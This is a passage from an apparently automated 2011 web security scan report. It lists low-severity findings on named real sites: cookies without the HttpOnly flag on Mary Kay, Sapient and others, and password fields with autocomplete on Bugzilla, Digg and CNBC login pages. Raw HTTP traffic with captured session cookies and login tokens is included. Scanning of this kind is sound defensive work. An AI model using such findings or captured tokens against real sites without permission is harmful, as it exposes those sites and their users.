Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

...[SNIP]...

13.255. http://www.marykay.com/images/searchbutton.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/searchbutton.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/searchbutton.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 239
Content-Type: image/gif
Last-Modified: Wed, 06 Apr 2011 17:12:22 GMT
Accept-Ranges: bytes
ETag: "99f3fcca7df4cb1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F0C410BF4DA1CA468842AA86BA246468; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

...[SNIP]...

13.256. http://www.marykay.com/scripts/i2a.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /scripts/i2a.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scripts/i2a.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1848
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT
Accept-Ranges: bytes
ETag: "80e28bcc7df4cb1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F487BB6C456B8904C272E490A0B8A392; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

var io = new Image();
var pageAction, price, sku, order_code, currency_id, user_defined1, user_defined2, user_defined3, user_defined4, ic_cat, ic_bu, ic_bc, ic_ch, ic_nso, altid, ic_type, urlA, prefi
...[SNIP]...

13.257. http://www.sapient.com/en-us/about-sapient/alliances.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/about-sapient/alliances.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: locale. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/about-sapient/alliances.html HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/search.html?search=xss%20contact%20faq%20phone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; locale=en-us; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.4.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:20 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34593


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

13.258. http://www.sapient.com/en-us/about-sapient/alliances/atg.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/about-sapient/alliances/atg.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: locale. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/about-sapient/alliances/atg.html HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:32:31 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

13.259. http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/about-sapient/corporate-social-responsibility.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: locale. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/about-sapient/corporate-social-responsibility.html HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/about-sapient/alliances/atg.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; locale=en-us; rootItemAlias=SapientNitro; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.1.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; sifrFetch=true

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:35:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:35:32 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32820


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

13.260. http://www.sapient.com/en-us/search.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /en-us/search.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: locale. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/search.html HTTP/1.1
Host: www.sapient.com
Proxy-Connection: keep-alive
Referer: http://www.sapient.com/en-us/about-sapient/corporate-social-responsibility.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qegiyz55y4uzmabk5sp4szzi; rootItemAlias=SapientNitro; sifrFetch=true; locale=en-us; __utma=180754853.1531017573.1315341143.1315341143.1315341143.1; __utmb=180754853.2.10.1315341143; __utmc=180754853; __utmz=180754853.1315341143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: locale=en-us; expires=Fri, 16-Sep-2011 15:37:09 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20346


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

13.261. http://www.tenzing.com/atg-ecommerce-hosting.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tenzing.com
Path:   /atg-ecommerce-hosting.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC HTTP/1.1
Host: www.tenzing.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=ATG+e-commerce+solutio
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache
Content-Length: 27188
Content-Type: text/html
Set-Cookie: CWHAdTrack=AD%5FUTM%5FTERM=Z&AD%5FUTM%5FMEDIUM=PPC&AD%5FUTM%5FWORD=Z&AD%5FUTM%5FGROUP=000&AD%5FUTM%5FSOURCE=OG0000&AD%5FUTM%5FCONTENT=01&AD%5FUTM%5FCAMPAIGN=001&AD%5FUTM%5FAD=00; expires=Tue, 06-Dec-2011 08:00:00 GMT; path=/
Set-Cookie: casestudiesID=3; expires=Thu, 06-Oct-2011 07:00:00 GMT; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

13.262. http://www2.znode.com/analytics

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.znode.com
Path:   /analytics

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: pi_opt_in1852, visitor_id1852. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /analytics?conly=true&visitor_id=191471275&pi_opt_in=&campaign_id=1407&account_id=2852&title=Ecommerce%20Storefront%20Software%20%7C%20Online%20Storefront%20Software&browser=Chrome&browser_version=13&operating_system=Windows&language=en-US&screen_height=1200&screen_width=1920&flash=true&java=true&url=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Ffeature.aspx&referrer=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Fdefault.aspx%3Fpi_ad_id%3D7270542494%26gclid%3DCLLul7r4iKsCFQVrgwodzysJ5Q HTTP/1.1
Host: www2.znode.com
Proxy-Connection: keep-alive
Referer: http://www.znode.com/znode-multifront/feature.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pardot=erpfv597lcoo1t2jorm9rsnvu5; visitor_id1852=191471185; __utma=58486625.433211037.1315341123.1315341123.1315341123.1; __utmb=58486625.2.10.1315341123; __utmc=58486625; __utmz=58486625.1315341123.1.1.utmgclid=CLLul7r4iKsCFQVrgwodzysJ5Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3p: CP="CAO DSP AND SO ON" policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding,User-Agent
Content-Length: 42
Content-Type: text/javascript; charset=utf-8
Set-Cookie: pi_opt_in1852=2d4456d0e1929f239244e44b; expires=Mon, 06-Sep-2021 15:33:57 GMT; path=/
Set-Cookie: visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:57 GMT; path=/
X-Pardot-LB: lb-s2
Connection: close

function piResponse() {

}
piResponse();


14. Password field with autocomplete enabled
There are 19 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


14.1. https://bugzilla.mozilla.org/show_bug.cgi

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page contains a form with the following action URL: https://bugzilla.mozilla.org/show_bug.cgi. The form contains the following password field with autocomplete enabled: Bugzilla_password.

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pp-app-bugs03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Tue, 06 Sep 2011 17:06:19 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
X-frame-options: SAMEORIGIN
Content-Length: 12117

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>



...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_top"
onsubmit="return check_mini_login_fields( '_top' );"
>

<input id="Bugzilla_login_top"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_top')"
>
<input class="bz_password"
id="Bugzilla_password_top"
name="Bugzilla_password"
type="password"
>

<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_top" value="password"
onfocus="mini_login_on_focus('_top')"
>
...[SNIP]...

14.2. https://bugzilla.mozilla.org/show_bug.cgi

Summary

Severity:   Low
Confidence:   Certain
Host:   https://bugzilla.mozilla.org
Path:   /show_bug.cgi

Issue detail

The page contains a form with the following action URL: https://bugzilla.mozilla.org/show_bug.cgi. The form contains the following password field with autocomplete enabled: Bugzilla_password.

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pp-app-bugs03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Tue, 06 Sep 2011 17:06:19 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
X-frame-options: SAMEORIGIN
Content-Length: 12117

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>



...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_bottom"
onsubmit="return check_mini_login_fields( '_bottom' );"
>

<input id="Bugzilla_login_bottom"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_bottom')"
>
<input class="bz_password"
id="Bugzilla_password_bottom"
name="Bugzilla_password"
type="password"
>

<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_bottom" value="password"
onfocus="mini_login_on_focus('_bottom')"

...[SNIP]...

14.3. http://digg.com/submit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL: (the form tag in the response carries no action attribute, so it submits to the page itself). The form contains the following password field with autocomplete enabled: password.

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=23877 10.2.130.26
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 8467

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pic
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

14.4. https://login.cnbc.com/cas/login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The page contains a form with the following action URL: login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header (relative to /cas/). The form contains the following password field with autocomplete enabled: password.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; TZM=-300; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:07 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 5684
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<div style="background-color: #ffffff; width: 330px;">
           <form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header">
            <input type="hidden" name="lt" value="_c93742DC7-8E51-DACF-2006-E90E8F3C3F62_k6F751721-4392-885A-E4F8-81B3503C4357" />
...[SNIP]...
<div class="inputDiv">

                        <input name="password" type="password" class="notVisited" onkeydown="entsub1(event);" onfocus="this.className='current'" onblur="this.className='doneWith';"/>
                   
</div>
...[SNIP]...

14.5. https://login.cnbc.com/cas/login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The page contains a form with the following action URL: login (relative to /cas/). The form contains the following password field with autocomplete enabled: password.

Request

GET /cas/login HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:32 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88450


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<div style="float:left;margin-top:20px;margin-left:20px; width: 255px;" align="left">
                           <form method="post" name="loginForm" action="login">
                            <input type="hidden" name="lt" value="_c2FBB13A9-B804-689D-A91D-586630FD8B16_kBA3C6101-34E1-55C2-CB4E-332BF7120AA6" />
...[SNIP]...
<div class="inputDiv">

                                    <input name="password" type="password" class="notVisited" onkeydown="entsub(event);" onfocus="this.className='current'" onblur="this.className='doneWith';"/>
                               
</div>
...[SNIP]...

14.6. https://login.cnbc.com/cas/login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The page contains a form with the following action URL: login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register (relative to /cas/). The form contains the following password field with autocomplete enabled: password.

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:34 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88546


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<div style="float:left;margin-top:20px;margin-left:20px; width: 255px;" align="left">
                           <form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register">
                            <input type="hidden" name="lt" value="_cB02421FE-411A-E96B-30ED-2D9711CC8C17_k116C7869-1B9B-CA43-E387-87BEB7F6E4CE" />
...[SNIP]...
<div class="inputDiv">

                                    <input name="password" type="password" class="notVisited" onkeydown="entsub(event);" onfocus="this.className='current'" onblur="this.className='doneWith';"/>
                               
</div>
...[SNIP]...

14.7. https://login.cnbc.com/cas/login

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.cnbc.com
Path:   /cas/login

Issue detail

The page contains a form with the following action URL: login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription (relative to /cas/). The form contains the following password field with autocomplete enabled: password.

Request

GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 7033
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<div style="float:left;margin-top:20px;margin-left:20px; width: 255px;" align="left">
